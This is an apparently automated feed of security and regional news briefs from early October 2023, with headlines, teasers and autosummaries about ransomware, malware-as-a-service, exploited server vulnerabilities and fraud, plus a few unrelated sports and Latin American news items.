            financial
            2023-10-02 https://www.helpnetsecurity.com/2023/10/02/online-fraud-damaging-effects-video/

            Online fraud is a pervasive and constantly evolving threat that affects individuals and organizations worldwide. Online fraudsters often leverage the anonymity and convenience of the internet to exploit vulnerabilities, manipulate victims, and conceal their true identities. Their fraudulent activities may result in financial losses, reputational damage, or privacy breaches for those who fall prey to their schemes. In this Help Net Security round-up, cybersecurity experts talk about online fraud and damaging effects it has on … More

            The post Online fraud can cost you more than money appeared first on Help Net Security.




            9 essential ransomware guides and checklists available for free

            exploits ransomware
            2023-10-02 https://www.helpnetsecurity.com/2023/10/02/free-ransomware-guides-checklists/

            According to Fortinet, ransomware activity has intensified, registering an increase of 13 times compared to the beginning of 2023 in terms of all malware detections. The rise of Ransomware-as-a-Service has primarily driven this surge in ransomware variations. According to a recent study, 65% of organizations identified ransomware as one of their top three threats to their operational viability. Additionally, ransomware is the most significant threat for 13% of these organizations. Here’s a collection of free … More

            The post 9 essential ransomware guides and checklists available for free appeared first on Help Net Security.


            Autosummary: This guide includes two primary resources: the Ransomware and Data Extortion Prevention Best Practice and the Ransomware and Data Extortion Response Checklist. Mitigating malware and ransomware attacks: this guidance from the National Cyber Security Centre UK helps private and public sector organizations deal with malware’s effects (including ransomware). "


            BunnyLoader: New Malware-as-a-Service Threat Emerges in the Cybercrime Underground

            exploits
            2023-10-02 https://thehackernews.com/2023/10/bunnyloader-new-malware-as-service.html
            Cybersecurity experts have discovered yet another malware-as-a-service (MaaS) threat called BunnyLoader that's being advertised for sale on the cybercrime underground. "BunnyLoader provides various functionalities such as downloading and executing a second-stage payload, stealing browser credentials and system information, and much more," Zscaler ThreatLabz researchers Niraj Shivtarkar and

            Autosummary: Some of the other stealers hosted on GitHub include Stealerium, Impost3r, Blank-Grabber, Nivistealer, Creal-stealer, and cstealer.


            Zanubis Android Banking Trojan Poses as Peruvian Government App to Target Users

            financial exploits latam government
            2023-10-02 https://thehackernews.com/2023/10/zanubis-android-banking-trojan-poses-as.html
            An emerging Android banking trojan called Zanubis is now masquerading as a Peruvian government app to trick unsuspecting users into installing the malware. "Zanubis's main infection path is through impersonating legitimate Peruvian Android applications and then tricking the user into enabling the Accessibility permissions in order to take full control of the device," Kaspersky said in an

            Autosummary: "As the 'update' runs, the phone remains unusable to the point that it can't be locked or unlocked, as the malware monitors those attempts and blocks them," Kaspersky noted.


            SymphonyAI accelerates financial crime investigations with generative AI technology

            financial
            2023-10-02 https://www.helpnetsecurity.com/2023/10/02/symphonyai-sensa-investigation-hub/

            SymphonyAI announced the Sensa Investigation Hub, a generative AI-enabled investigation and case management platform that propels financial institutions into the future of financial crime management. The Sensa Investigation Hub uses predictive and generative AI technology with unparalleled global domain risk and compliance expertise, culminating in an enterprise-wide, next-generation investigation platform that delivers up to 70% increased investigator productivity. Building on the industry leadership of the Sensa Copilot for financial crime investigators introduced earlier this year … More

            The post SymphonyAI accelerates financial crime investigations with generative AI technology appeared first on Help Net Security.



            Critical vulnerability in WS_FTP Server exploited by attackers (CVE-2023-40044)

            exploits
            2023-10-02 https://www.helpnetsecurity.com/2023/10/02/cve-2023-40044/

            Progress Software, the company behind the recently hacked MOVEit file-sharing tool, has recently fixed two critical vulnerabilities (CVE-2023-40044, CVE-2023-42657) in WS_FTP Server, another popular secure file transfer solution. Proof-of-concept code for CVE-2023-40044 has been available since Friday, and Rapid7 researchers have observed multiple instances of WS_FTP exploitation in the wild, with two different attack chains.

            The exploited vulnerability (CVE-2023-40044) and the update

            CVE-2023-40044 is a .NET deserialization vulnerability that could allow an unauthenticated threat actor … More

            The post Critical vulnerability in WS_FTP Server exploited by attackers (CVE-2023-40044) appeared first on Help Net Security.



            Most dual ransomware attacks occur within 48 hours

            exploits ransomware
            2023-10-02 https://www.helpnetsecurity.com/2023/10/02/dual-ransomware-attacks/

            Since July 2023, the Federal Bureau of Investigation (FBI) has noticed a new trend: dual ransomware attacks on the same victim, occurring in close proximity to one another.

            Dual ransomware attacks

            Dual ransomware attacks are when attacks against the same victim occur within 10 days (or less) of each other. According to the FBI, most of these occurred within 48 hours of each other. “During these attacks, cyber threat actors deployed two different ransomware variants … More

            The post Most dual ransomware attacks occur within 48 hours appeared first on Help Net Security.



            OpenRefine's Zip Slip Vulnerability Could Let Attackers Execute Malicious Code

            exploits
            2023-10-02 https://thehackernews.com/2023/10/openrefines-zip-slip-vulnerability.html
            A high-severity security flaw has been disclosed in the open-source OpenRefine data cleanup and transformation tool that could result in arbitrary code execution on affected systems. Tracked as CVE-2023-37476 (CVSS score: 7.8), the vulnerability is a Zip Slip vulnerability that could have adverse impacts when importing a specially crafted project in versions 3.7.3 and below. "Although OpenRefine

            Autosummary: The disclosure comes as proof-of-concept (PoC) exploit code has surfaced for a pair of now-patched flaws in Microsoft SharePoint Server – CVE-2023-29357 (CVSS score: 9.8) and CVE-2023-24955 (CVSS score: 7.2) – that could be chained to achieve privilege escalation and remote code execution.


            Arm warns of Mali GPU flaws likely exploited in targeted attacks

            exploits
            2023-10-02 https://www.bleepingcomputer.com/news/security/arm-warns-of-mali-gpu-flaws-likely-exploited-in-targeted-attacks/
            Arm in a security advisory today is warning of an actively exploited vulnerability affecting the widely-used Mali GPU drivers. [...]

            Autosummary: The following driver versions are impacted by the vulnerability: Midgard GPU kernel driver, all versions from r12p0 to r32p0; Bifrost GPU kernel driver, all versions from r0p0 to r42p0; Valhall GPU kernel driver, all versions from r19p0 to r42p0; Arm 5th Gen GPU architecture kernel driver, all versions from r41p0 to r42p0. Midgard, Bifrost, and Valhall series were introduced in 2013, 2016, and 2019, respectively, so they concern older device models.


            Motel One discloses data breach following ransomware attack

            financial exploits ransomware
            2023-10-02 https://www.bleepingcomputer.com/news/security/motel-one-discloses-data-breach-following-ransomware-attack/
            The Motel One Group has announced that it has been targeted by ransomware actors who managed to steal some customer data, including the details of 150 credit cards. [...]

            Autosummary: Motel One is a low-budget hotel chain that operates over ninety hotels with 25,000 rooms in Germany, Austria, the UK, Denmark, Belgium, the Netherlands, Spain, Poland, the Czech Republic, and the United States.


            FBI warns of surge in "phantom hacker" scams impacting elderly

            financial
            2023-10-02 https://www.bleepingcomputer.com/news/security/fbi-warns-of-surge-in-phantom-hacker-scams-impacting-elderly/
            The FBI issued a public service announcement warning of a significant increase in "phantom hacker" scams targeting senior citizens across the United States. [...]

            Autosummary: "This Phantom Hacker scam is an evolution of more general tech support scams, layering imposter tech support, financial institution, and government personas to enhance the trust victims place in the scammers and identify the most lucrative accounts to target," the FBI said.


            Eclypsium’s threat detection capabilities defend network infrastructure from cybercriminals

            ciber
            2023-10-02 https://www.helpnetsecurity.com/2023/10/02/eclypsium-threat-detection/

            Eclypsium launches new threat detection capabilities for network appliances to its Eclypsium supply chain security platform. Over the past summer, ransomware groups including Akira, CACTUS, FIN8, and LockBit have been observed attacking network appliances from a number of vendors, looking to evade endpoint security and maintain persistence within target environments. In addition, state-sponsored adversaries continue to target network devices, with the NSA and CISA recently issuing an advisory about the BlackTech group targeting network routers … More

            The post Eclypsium’s threat detection capabilities defend network infrastructure from cybercriminals appeared first on Help Net Security.



            Critical zero-days in Exim revealed, only 3 have been fixed

            exploits
            2023-10-02 https://www.helpnetsecurity.com/2023/10/02/critical-zero-days-in-exim/

            Six zero-days in Exim, the most widely used mail transfer agent (MTA), were revealed by Trend Micro’s Zero Day Initiative (ZDI) last Wednesday. Due to what seems to be insufficient information and poor communication, fixes for only three of them have been included in Exim v4.96.1, a security release made available today.

            Exim is a good target

            The popularity of Exim is not surprising: it’s free, efficient, highly configurable, regularly updated, and often probed … More

            The post Critical zero-days in Exim revealed, only 3 have been fixed appeared first on Help Net Security.

            Autosummary: CVE-2023-42115, along with CVE-2023-42116 (an SMTP challenge stack-based buffer overflow bug) and CVE-2023-42114 (an NTLM challenge out-of-bounds read), have been fixed in Exim v4.96.1 and the latest v4.97 release candidates.


            New BunnyLoader threat emerges as a feature-rich malware-as-a-service

            exploits
            2023-10-02 https://www.bleepingcomputer.com/news/security/new-bunnyloader-threat-emerges-as-a-feature-rich-malware-as-a-service/
            Security researchers discovered a new malware-as-a-service (MaaS) named "BunnyLoader" advertised on multiple hacker forums as a fileless loader that can steal and replace the contents of the system clipboard. [...]

            Autosummary: Apart from the mentioned functions, the malware also features modules to steal data stored on web browsers (passwords, credit cards, browsing history), cryptocurrency wallets, VPNs, messaging apps, and more, essentially acting as a standard info-stealer. In its current state, BunnyLoader is sold for $250, while the "private stub" version, which features stronger anti-analysis, in-memory injection, AV evasion, and additional persistence mechanisms, sells for $350.


            Ransomware gangs now exploiting critical TeamCity RCE flaw

            exploits government
            2023-10-02 https://www.bleepingcomputer.com/news/security/ransomware-gangs-now-exploiting-critical-teamcity-rce-flaw/
            Ransomware gangs are now targeting a recently patched critical vulnerability in JetBrains' TeamCity continuous integration and deployment server. [...]

            Autosummary: Vulnerable TeamCity servers (Shadowserver Foundation). Targets set on vulnerable TeamCity servers: just days after Sonar published their blog post, multiple attackers started exploiting this critical auth bypass flaw, according to threat intelligence companies GreyNoise and PRODAFT.


            Exploit available for critical WS_FTP bug exploited in attacks

            exploits
            2023-10-02 https://www.bleepingcomputer.com/news/security/exploit-available-for-critical-ws-ftp-bug-exploited-in-attacks/
            Over the weekend, security researchers released a proof-of-concept (PoC) exploit for a maximum severity remote code execution vulnerability in Progress Software's WS_FTP Server file sharing platform. [...]

            Autosummary: WS_FTP Server instances exposed online (Shodan). Exploited in the wild: the day the PoC exploit was released, cybersecurity company Rapid7 also revealed that attackers began exploiting CVE-2023-40044 on Saturday evening, September 30.


            Microsoft Defender no longer flags Tor Browser as malware

            exploits
            2023-10-02 https://www.bleepingcomputer.com/news/security/microsoft-defender-no-longer-flags-tor-browser-as-malware/
            For Windows users who frequently use the TorBrowser, there's been a pressing concern. Recent versions of the TorBrowser, specifically because of the tor.exe file it contained, were being flagged as potential threats by Windows Defender. [...]

            Autosummary: For users who still see this false positive, Microsoft provided a clear set of instructions to update and clear any previous flags: Open the command prompt as an administrator.


            Exim patches three of six zero-day bugs disclosed last week

            exploits
            2023-10-02 https://www.bleepingcomputer.com/news/security/exim-patches-three-of-six-zero-day-bugs-disclosed-last-week/
            Exim developers have released patches for three of the zero-days disclosed last week through Trend Micro's Zero Day Initiative (ZDI), one of them allowing unauthenticated attackers to gain remote code execution. [...]



            WS_FTP flaw CVE-2023-40044 actively exploited in the wild

            exploits
            2023-10-02 https://securityaffairs.com/151829/hacking/ws_ftp-flaw-cve-2023-40044-actively-exploited.html

            Experts warn of threat actors actively exploiting the recently disclosed CVE-2023-40044 flaw in Progress Software’s WS_FTP products. Progress Software recently warned customers to address a critical severity vulnerability, tracked as CVE-2023-40044 (CVSS score 10), in its WS_FTP Server software, which is used by thousands of IT teams worldwide. The vulnerability was discovered by researchers at the […]

            The post WS_FTP flaw CVE-2023-40044 actively exploited in the wild appeared first on Security Affairs.

            Autosummary: WS_FTP flaw CVE-2023-40044 actively exploited in the wild, by Pierluigi Paganini, October 02, 2023.


            National Logistics Portal (NLP) data leak: seaports in India were left vulnerable to takeover by hackers

            industry
            2023-10-02 https://securityaffairs.com/151819/data-breach/national-logistics-portal-nlp-data-leak.html

            The National Logistics Portal (NLP), a newly launched platform to manage all port operations in India, left public access to sensitive data, posing the risk of a potential takeover by threat actors. On September 24th, researchers discovered that the NLP platform was exposing sensitive credentials, secrets, and encryption keys via publicly available JS files. In […]

            The post National Logistics Portal (NLP) data leak: seaports in India were left vulnerable to takeover by hackers appeared first on Security Affairs.

            Autosummary: National Logistics Portal (NLP) data leak: seaports in India were left vulnerable to takeover by hackers, by Pierluigi Paganini, October 02, 2023.


            Ransomware attack on Johnson Controls may have exposed sensitive DHS data

            exploits
            2023-10-02 https://securityaffairs.com/151806/data-breach/johnson-controls-attack-impacts-dhs.html

            Experts warn that the recent attack on building automation giant Johnson Controls may have exposed data of the Department of Homeland Security (DHS). Johnson Controls International plc is a multinational conglomerate with a diversified portfolio of products and services primarily focused on building technologies and solutions. The company provides HVAC (heating, ventilation, and air conditioning), […]

            The post Ransomware attack on Johnson Controls may have exposed sensitive DHS data appeared first on Security Affairs.

            Autosummary: The company provides HVAC (heating, ventilation, and air conditioning), solutions for building automation, fire and security systems, and components for energy management.


            Mexico church: Ten dead after Tamaulipas roof collapse

            latam
            2023-10-02 https://www.bbc.co.uk/news/world-latin-america-66979447?at_medium=RSS&at_campaign=KARANGA
            Three children are among those killed during the ceremony in the coastal city of Ciudad Madero.


            Ransomware reinfections on the rise from improper remediation

            exploits
            2023-10-02 https://www.malwarebytes.com/blog/business/2023/10/ransomware-reinfections-on-the-rise-from-improper-remediation

            Ransomware attacks have been ramping up in 2023 and reinfections are occurring all over the globe, forcing lean IT teams to prepare.


            The post Ransomware reinfections on the rise from improper remediation appeared first on Malwarebytes Labs.

            Autosummary: Once cybercriminals gain entry, they’ll look to further infiltrate the organization by searching for vulnerabilities, escalating privileges, reconfiguring security controls, stealing additional credentials, and exfiltrating other sensitive data. Any corporation that is lacking in IT staff, budget, resources, or time to investigate and prioritize cyberthreats could be at risk: a single ransomware attack can cause massive financial, logistical, and reputational damage—sometimes enough to shutter a business for good.

            Ways to avoid ransomware reinfection: while a numbered list could never replace our remediation experts, there are a few tried-and-true, high-level actions that resource-constrained IT teams can take to help protect against ransomware attacks, whether it’s the first or sixth time getting hit. After cleaning all remnants of the attack from the network, security experts recommended password resets for all privileged, non-privileged, and service accounts, as well as two-factor authentication (2FA) for VPN and email access. Neglecting to reset credentials: once systems have been recovered and cleaned, and it’s confirmed the network is secure, SMBs should reset all passwords for privileged, non-privileged, and third-party accounts.

            Once access to the email was terminated in the initial remediation with Microsoft, the bad guys began using Nebula and audience response systems (ARS) to continue the attack, running commands, disabling protections, and changing policies. Even after mitigating a ransomware attack, hidden doors may remain unnoticed, enabling threat actors to reactivate dormant artifacts or use access that was previously attained through stolen credentials, backdoors, or reconfigurations. Just a few days after the MDR analyst helped the new customer identify and remove additional ransomware, an unencountered persistent mechanism was discovered, triggering a threat hunt that revealed even more hidden gems: two compromised domain admin accounts, a domain controller, and an SQL server. However, if onboarding a security partner during incident response, they should provide subject matter expertise and technical support, ensure that the threat actors are eradicated from the network, and catch residual issues that could result in follow-up compromise once the incident is closed.


            FBI warns of multiple ransomware attacks on same victim

            exploits ransomware
            2023-10-02 https://www.malwarebytes.com/blog/news/2023/10/fbi-warns-of-multiple-ransomware-attacks-on-same-victim

            Categories: News, Ransomware

            Tags: FBI, ransomware, dual attacks, wipers

            The FBI has warned about new tactics deployed by ransomware gangs, dual attacks and use of wipers.


            The post FBI warns of multiple ransomware attacks on same victim appeared first on Malwarebytes Labs.

            Autosummary: With multiple, or dual, ransomware attacks, the FBI says cybercriminals deployed two different ransomware variants against victim companies, using the following variants: AvosLocker, Diamond, Hive, Karakurt, LockBit, Quantum, and Royal. Rivalry between ransomware gangs; Initial Access Brokers selling to multiple ransomware operators; extra pressure on the victim to pay the ransom. The second trend, according to the FBI, is that multiple ransomware groups have increased the use of custom data theft, wiper tools, and malware to pressure victims to negotiate. Information about your company, such as industry, size, etc.; victim impact statement.


            Week in review: Chrome zero-day is actually in libwebp, Sony hacking rumours

            exploits
            2023-10-01 https://www.helpnetsecurity.com/2023/10/01/week-in-review-chrome-zero-day-is-actually-in-libwebp-sony-hacking-rumours/

            Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: How global enterprises navigate the complex world of data privacy In this Help Net Security interview, Evelyn de Souza, Head of Privacy Compliance, Oracle SaaS Cloud, talks about the constant efforts required to keep up with privacy laws in each country, and ensuring compliance across the entire organization. MITRE ATT&CK project leader on why the framework remains vital for cybersecurity … More

            The post Week in review: Chrome zero-day is actually in libwebp, Sony hacking rumours appeared first on Help Net Security.

            Autosummary: Guide: SaaS Offboarding Checklist. Download this template from Nudge Security for the essential steps of IT offboarding in the age of SaaS. New infosec products of the week: September 29, 2023. Here’s a look at the most interesting products from the past week, featuring releases from AlphaSOC, Baffle, Immersive Labs, OneTrust, Panzura, runZero, and SeeMetrics.


            Meet LostTrust ransomware — A likely rebrand of the MetaEncryptor gang

            exploits ransomware
            2023-10-01 https://www.bleepingcomputer.com/news/security/meet-losttrust-ransomware-a-likely-rebrand-of-the-metaencryptor-gang/
            The LostTrust ransomware operation is believed to be a rebrand of MetaEncryptor, utilizing almost identical data leak sites and encryptors. [...]

            Autosummary: When executed, LostTrust will disable and stop numerous Windows services to ensure all files can be encrypted, including any services containing the Firebird, MSSQL, SQL, Exchange, wsbex, postgresql, BACKP, tomcat, SBS, and SharePoint strings. BleepingComputer also found that both the LostTrust [VirusTotal] and MetaEncryptor [VirusTotal] encryptors are virtually identical, with some minor changes to ransom notes, embedded public keys, ransom note names, and encrypted file extensions.


            Ten Cuban migrants hiding in truck die in Mexico accident

            latam
            2023-10-01 https://www.bbc.co.uk/news/world-latin-america-66978209?at_medium=RSS&at_campaign=KARANGA
            At least 17 others are injured after the vehicle flipped over on a motorway in Chiapas state.


            FBI Warns of Rising Trend of Dual Ransomware Attacks Targeting U.S. Companies

            exploits ransomware
            2023-09-30 https://thehackernews.com/2023/09/fbi-warns-of-rising-trend-of-dual.html
            The U.S. Federal Bureau of Investigation (FBI) is warning of a new trend of dual ransomware attacks targeting the same victims, at least since July 2023. "During these attacks, cyber threat actors deployed two different ransomware variants against victim companies from the following variants: AvosLocker, Diamond, Hive, Karakurt, LockBit, Quantum, and Royal," the FBI said in an alert. "Variants



            Iranian APT Group OilRig Using New Menorah Malware for Covert Operations

            exploits
            2023-09-30 https://thehackernews.com/2023/09/iranian-apt-group-oilrig-using-new.html
            Sophisticated cyber actors backed by Iran known as OilRig have been linked to a spear-phishing campaign that infects victims with a new strain of malware called Menorah. "The malware was designed for cyberespionage, capable of identifying the machine, reading and uploading files from the machine, and downloading another file or malware," Trend Micro researchers Mohamed Fahmy and Mahmoud Zohdy



            FBI warns of dual ransomware attacks

            exploits ransomware
            2023-09-30 https://securityaffairs.com/151722/cyber-crime/fbi-warns-dual-ransomware-attacks.html

            The U.S. Federal Bureau of Investigation (FBI) warns of dual ransomware attacks aimed at the same victims. The U.S. Federal Bureau of Investigation (FBI) is warning of dual ransomware attacks, a new worrisome trend in the threat landscape that sees threat actors targeting the same victims two times. “As of July 2023, the FBI noted […]

            The post FBI warns of dual ransomware attacks appeared first on Security Affairs.

            Autosummary: The government experts observed the threat actors using the following ransomware families: AvosLocker, Diamond, Hive, Karakurt, LockBit, Quantum, and Royal.


            Child abuse site taken down, organized child exploitation crime suspected – exclusive

            exploits
            2023-09-30 https://securityaffairs.com/151706/security/child-abuse-site-taken-down-cybernews.html

            A child abuse site has been taken down following a request to German law enforcement by Cybernews research team. A hacker collective, who wanted to remain anonymous, has been relentlessly hunting online crooks who benefit from videos of children being abused. This week, they discovered a website dedicated to pedophiles – it was full of […]

            The post Child abuse site taken down, organized child exploitation crime suspected – exclusive appeared first on Security Affairs.

            Autosummary: Following a tip-off by the source, Cybernews also contacted German law enforcement, namely the BKA, Germany’s internal security organization, with a request to take down the site as soon as possible.


            Argentina 59-5 Chile: Pumas boost Rugby World Cup quarter-final hopes and set up Japan decider

            latam
            2023-09-30 https://www.bbc.co.uk/sport/rugby-union/66972227?at_medium=RSS&at_campaign=KARANGA
            Argentina set up a winner-takes-all tie with Japan next week as they boost their Rugby World Cup quarter-final hopes with a win over neighbours Chile.

            Autosummary: Line-ups. Argentina: Bogado, Isgro, Cinti, De la Fuente, Imhoff, Sanchez, Cubelli; Sclavi, Creevy, Bello, Pagadizabal, Rubiolo, Gonzalez, Kremer, Isa. Replacements: Ruiz, Vivas, Gomez Kodela, Alemanno, Oviedo, Bazan Velez, Carreras, Cruz Mallia. Chile: Ayarza, Videla, Saavedra, Garafulic, Ignacio Larenas, Fernandez, Torrealba; Carrasco, Bohme, Dittus, Pedrero, Eissmann, Sigren, Saavedra, Martinez. Replacements: Dussaillant, Lues, Inostroza, Sarmiento, Escobar, Silva, Herreros, Urroz. Referee: Paul Williams (New Zealand).


            ALPHV/BlackCat ransomware gang hacked the hotel chain Motel One

            exploits ransomware
            2023-09-30 https://securityaffairs.com/151732/cyber-crime/alphv-ransomware-motel-one.html

            The ALPHV/BlackCat ransomware gang added the hotel chain Motel One to the list of victims on its Tor leak site. Motel One is a German hotel chain that offers budget-friendly accommodations primarily targeted at business and leisure travelers. It is known for its stylish and design-focused hotels that aim to provide a comfortable and affordable […]

            The post ALPHV/BlackCat ransomware gang hacked the hotel chain Motel One appeared first on Security Affairs.

            Autosummary: The Alphv ransomware group has been very active in this period; recently it claimed to have hacked Clarion, the global manufacturer of audio and video equipment for cars and other vehicles. The BlackCat/ALPHV ransomware gang has been active since November 2021; the list of its victims is long and includes industrial explosives manufacturer SOLAR INDUSTRIES INDIA, the US defense contractor NJVC, gas pipeline Creos Luxembourg S.A., the fashion giant Moncler, Swissport, NCR, and Western Digital.


            Rugby World Cup 2023: Chile leave first tournament "smiling" despite four losses

            latam
            2023-09-30 https://www.bbc.co.uk/sport/rugby-union/66973868?at_medium=RSS&at_campaign=KARANGA
            Chile exit their first Rugby World Cup smiling despite four defeats - and hope it is the start of something special.

            Autosummary: "We got more positives than negatives out of this." Chile qualified for their first World Cup by beating the United States 52-51 in a two-legged qualification play-off in July 2022, becoming the first debutants in the competition since Portugal in 2007, which was history in itself.


            Financial crime compliance costs exceed $206 billion

            financial
            2023-09-29 https://www.helpnetsecurity.com/2023/09/29/financial-crime-compliance-costs/

            The growing complexity of compliance regulations and ever-evolving criminal methodologies are a major difficulty for financial institutions, according to LexisNexis Risk Solutions. Global financial crime compliance costs for financial institutions exceed $206 billion. This cost is comparable to more than 12% of global research and development (R&D) expenditure and equates to $3.33 per month for each working-age individual on earth. Financial crime professionals embrace AI While certain industries are still determining the ways in which … More

            The post Financial crime compliance costs exceed $206 billion appeared first on Help Net Security.

            Autosummary: However, similar to historical changes in ways of working, problems with data quality, data silos, outdated legacy systems, and a lack of collaboration internally can create avoidable compliance activity and expenditure.


            Why California’s Delete Act matters for the whole country

            government
            2023-09-29 https://www.helpnetsecurity.com/2023/09/29/delete-act-california-video/

            The California State Legislature passed Senate Bill 362, known as the Delete Act, to simplify the process for consumers to ask to remove their personal data gathered by data brokers. In this Help Net Security video, Dr. Chris Pierson, CEO of BlackCloak, discusses why this bill matters to CISOs. This new law will set the stage for better regulation and transparency. It will finally give consumers the right to delete.

            The post Why California’s Delete Act matters for the whole country appeared first on Help Net Security.

            "

            Autosummary: "


            Cybersecurity budgets show moderate growth

            ciber
            2023-09-29 https://www.helpnetsecurity.com/2023/09/29/cybersecurity-budgets-growth/

            Despite the economic uncertainty and inflation, security budgets generally continued to rise but at a lower rate than prior years, according to new research from IANS and Artico Search. Security budgets increase by 6% in 2023 Respondents reported an average security budget increase of 6%, a significant decrease from the 17% increase in the previous budget cycle and marks a 65% reduction in growth. Across industries, the decline was most prominent in technology firms, which … More

            The post Cybersecurity budgets show moderate growth appeared first on Help Net Security.

            "

            Autosummary: Compared to publicly listed companies, not-for-profit organizations, and other forms of private enterprises, VC-backed firms have an outsized security budget percentage, averaging nearly 30%, which is more than 2x the overall percentage. "


            Cisco Warns of Vulnerability in IOS and IOS XE Software After Exploitation Attempts

            exploits
            2023-09-29 https://thehackernews.com/2023/09/cisco-warns-of-vulnerability-in-ios-and.html
            Cisco is warning of attempted exploitation of a security flaw in its IOS Software and IOS XE Software that could permit an authenticated remote attacker to achieve remote code execution on affected systems. The medium-severity vulnerability is tracked as CVE-2023-20109, and has a CVSS score of 6.6. It impacts all versions of the software that have the GDOI or G-IKEv2 protocol enabled. The "

            Autosummary: "


            VMware users anxious about costs and ransomware threats

            exploits ransomware
            2023-09-29 https://www.helpnetsecurity.com/2023/09/29/vmware-customers-concerns/

            VMware customers have growing concerns about the state of the virtualization software and the company behind it – ranging from rising licensing costs, ransomware vulnerabilities and a diminishing quality of support, according to VergeIO. 84% of respondents indicated that they were concerned about VMware’s current and future costs, with many highlighting “per-core” renewal quotes and licensing agreements that require a commitment to year-over-year spending increases as additional points of distress. With a rise in ransomware … More

            The post VMware users anxious about costs and ransomware threats appeared first on Help Net Security.

            "

            Autosummary: "


            CISA adds JBoss RichFaces Framework flaw to its Known Exploited Vulnerabilities catalog

            exploits
            2023-09-29 https://securityaffairs.com/151656/security/cisa-adds-jboss-richfaces-framework-flaw-to-its-known-exploited-vulnerabilities-catalog.html

            US CISA added the flaw CVE-2018-14667 in Red Hat JBoss RichFaces Framework to its Known Exploited Vulnerabilities catalog. US Cybersecurity and Infrastructure Security Agency (CISA) added the critical flaw CVE-2018-14667 (CVSS score 9.8) affecting Red Hat JBoss RichFaces Framework to its Known Exploited Vulnerabilities Catalog. The issue is an Expression Language (EL) injection via the UserResource resource, […]

            The post CISA adds JBoss RichFaces Framework flaw to its Known Exploited Vulnerabilities catalog appeared first on Security Affairs.

            "

            Autosummary: "


            Lazarus hackers breach aerospace firm with new LightlessCan malware

            exploits
            2023-09-29 https://www.bleepingcomputer.com/news/security/lazarus-hackers-breach-aerospace-firm-with-new-lightlesscan-malware/
            The North Korean "Lazarus" hacking group targeted employees of an aerospace company located in Spain with fake job opportunities to hack into the corporate network using a previously unknown "LightlessCan" backdoor. [...] "

            Autosummary: The malware replicates many native Windows commands like ping, ipconfig, netstat, mkdir, schtasks, systeminfo, etc., so it can execute them without appearing in the system console for better stealthiness against real-time monitoring tools. "


            Nexusflow raises $10.6 million to improve generative AI in cybersecurity

            ciber
            2023-09-29 https://www.helpnetsecurity.com/2023/09/29/nexusflow-seed-round-10-6-million/

            Nexusflow announced that it has raised a $10.6 million seed round led by Point72 Ventures, with participation from Fusion Fund and several AI luminaries in Silicon Valley. Nexusflow was founded by AI experts Professor Jiantao Jiao and Professor Kurt Keutzer from the Berkeley AI Research (BAIR) Lab, along with industry AI leader Jian Zhang. Jian Zhang received his Ph.D. from the Stanford AI Lab and served as the former Machine Learning Director at SambaNova Systems, … More

            The post Nexusflow raises $10.6 million to improve generative AI in cybersecurity appeared first on Help Net Security.

            "

            Autosummary: "


            Microsoft"s AI-Powered Bing Chat Ads May Lead Users to Malware-Distributing Sites

            exploits
            2023-09-29 https://thehackernews.com/2023/09/microsofts-ai-powered-bing-chat-ads-may.html
            Malicious ads served inside Microsoft Bing’s artificial intelligence (AI) chatbot are being used to distribute malware when searching for popular tools. The findings come from Malwarebytes, which revealed that unsuspecting users can be tricked into visiting booby-trapped sites and installing malware directly from Bing Chat conversations. Introduced by Microsoft in February 2023, Bing Chat is an "

            Autosummary: "The attacker, masquerading as the hotel, reaches out to the customer through the booking site, urging the customer to "re-confirm their credit card," then steals the customer"s information," Akamai researcher Shiran Guez said, noting how the attacks prey on the victim"s sense of urgency to pull off the operation.Supercharge Your Skills Cofense, in a report published this week, said the hospitality sector has been at the receiving end of a "well-crafted and innovative social engineering attack" that"s designed to deliver stealer malware such as Lumma Stealer, RedLine Stealer, Stealc, Spidey Bot, and Vidar. "


            Chinese threat actors stole around 60,000 emails from US State Department in Microsoft breach

            government
            2023-09-29 https://securityaffairs.com/151685/hacking/u-s-state-department-stolen-emails.html

            China-linked threat actors stole around 60,000 emails from U.S. State Department after breaching Microsoft’s Exchange email platform in May. China-linked hackers who breached Microsoft’s email platform in May have stolen tens of thousands of emails from U.S. State Department accounts, a Senate staffer told Reuters this week. During a briefing by U.S. State Department IT officials, […]

            The post Chinese threat actors stole around 60,000 emails from US State Department in Microsoft breach appeared first on Security Affairs.

            "

            Autosummary: Chinese threat actors stole around 60,000 emails from US State Department in Microsoft breach. Pierluigi Paganini, September 29, 2023. China-linked threat actors stole around 60,000 emails from U.S. State Department after breaching Microsoft’s Exchange email platform in May. "


            Three men found guilty of laundering $2.5 million in Target gift card tech support scam

            financial
            2023-09-29 https://www.bitdefender.com/blog/hotforsecurity/three-men-found-guilty-of-laundering-2-5-million-in-target-gift-card-tech-support-scam/
            Three Californian residents have been convicted of laundering millions of dollars tricked out of older adults who had fallen victim to government-imposter and tech support scams. Read more in my article on the Hot for Security blog. "

            Autosummary: "


            Millions of Exim mail servers exposed to zero-day RCE attacks

            exploits
            2023-09-29 https://www.bleepingcomputer.com/news/security/millions-of-exim-mail-servers-exposed-to-zero-day-rce-attacks/
            A critical zero-day vulnerability in all versions of Exim mail transfer agent (MTA) software can let unauthenticated attackers gain remote code execution (RCE) on Internet-exposed servers. [...] "

            Autosummary: Found by an anonymous security researcher and disclosed through Trend Micro’s Zero Day Initiative (ZDI), the security bug (CVE-2023-42115) is due to an Out-of-bounds Write weakness found in the SMTP service. "


            Exploit released for Microsoft SharePoint Server auth bypass flaw

            exploits
            2023-09-29 https://www.bleepingcomputer.com/news/security/exploit-released-for-microsoft-sharepoint-server-auth-bypass-flaw/
            Proof-of-concept exploit code has surfaced on GitHub for a critical authentication bypass vulnerability in Microsoft SharePoint Server, allowing privilege escalation. [...] "

            Autosummary: Although this exploit does not grant attackers remote code execution, as it does not cover the entire exploit chain demonstrated at Pwn2Own Vancouver, the author clarifies that attackers could potentially combine it with the CVE-2023-24955 command injection bug to achieve this objective. "


            Cybercriminals Using New ASMCrypt Malware Loader Flying Under the Radar

            exploits ciber
            2023-09-29 https://thehackernews.com/2023/09/cybercriminals-using-new-asmcrypt.html
            Threat actors are selling a new crypter and loader called ASMCrypt, which has been described as an "evolved version" of another loader malware known as DoubleFinger. "The idea behind this type of malware is to load the final payload without the loading process or the payload itself being detected by AV/EDR, etc.," Kaspersky said in an analysis published this week. DoubleFinger was first "

            Autosummary: Thus, when a file is uploaded, the website returns a malicious binary that masquerades as a PDF with a double extension ".pdf.exe" that, upon execution, harvests sensitive information from infected hosts. "


            The Week in Ransomware - September 29th 2023 - Dark Angels

            exploits ransomware
